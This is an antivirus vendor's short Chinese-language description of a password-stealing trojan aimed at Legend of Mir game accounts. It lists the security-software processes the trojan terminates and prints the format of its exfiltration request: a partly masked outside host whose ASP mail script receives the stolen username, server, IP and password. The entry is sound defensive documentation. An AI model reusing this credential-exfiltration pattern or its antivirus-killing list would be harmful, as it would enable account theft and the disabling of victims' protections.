病毒名称(中文):
病毒别名:
TrojanSpy.Win32.Sincom.e[AVP]
威胁级别:
★★☆☆☆
病毒类型:
木马程序
病毒长度:
19968
影响系统:
Win9xWinNT
病毒行为:
该病毒运行后会窃取用户的传奇账号密码,并把这些信息,发送给木马种植者,导致感染机器用户在传奇游戏中的角色被他人控制。该病毒还会关闭常见的杀毒软件,以防止自己被杀毒软件清除。
1、关闭以下进程,以防止被查杀
kvapfw.exe
kvfw.exe
DFVSNET.EXE.
PasswordGuard.exe
EGhost.exe
Iparmor.exe
pfw.exe
2、病毒发现传奇帐号密码后,会按以下格式发送到指定的ASP脚本,ASP脚本再转发邮件
www.5×××9.com///cqtstsqj/mmmm/sendmail.asp?tomail=××××&mailSubject=注册版&FromName=×××&frommail=×××&Priority=3&Submit=%B7%A2+%CB%CD&&action=send&mailbody=区号:×××用户名:×××服务器:×××对方ip地址:×××对方发信时间:×××密码×××